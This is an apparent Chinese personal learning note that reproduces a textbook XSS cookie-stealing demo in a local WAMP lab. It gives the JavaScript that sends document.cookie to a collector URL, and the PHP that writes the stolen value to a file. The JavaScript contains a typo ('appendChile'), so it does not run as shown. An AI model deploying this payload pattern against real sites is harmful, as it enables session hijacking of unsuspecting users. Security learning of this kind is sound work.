通过xss窃取cookie 在白帽子讲web安全上看到的第一个xsspayload 尽管到现在可能是然并卵 还是觉得自己动手尝试一下比较好

使用wamp搭建环境

主页代码

<html>
<head><meta charset="utf-8"></head>
<body>
	<script src = test.js></script>
</body>
</html>

test.js代码

var img = document.createElement("img");
img.src = "http://127.0.0.1/test.php?id=" + escape(document.cookie);
document.body.appendChile(img)

test.php代码

<?php
	$id = $_GET['id'];
	if (isset($id)){
		$fp = fopen('1.txt',w);
		fwrite($fp, $id);
		fclose($fp);
	}
	else{
		echo 'failed';
	}
?>

然后访问主页代码就可以在1.txt中得到cookie

这里只是自己动手验证一下 方便与理解与记忆 当然在实际应用中这样肯定是不行的，用户又不傻 = =

---

在xxxx教育平台找到一个储存型XSS交到了补天，但是没给通过。。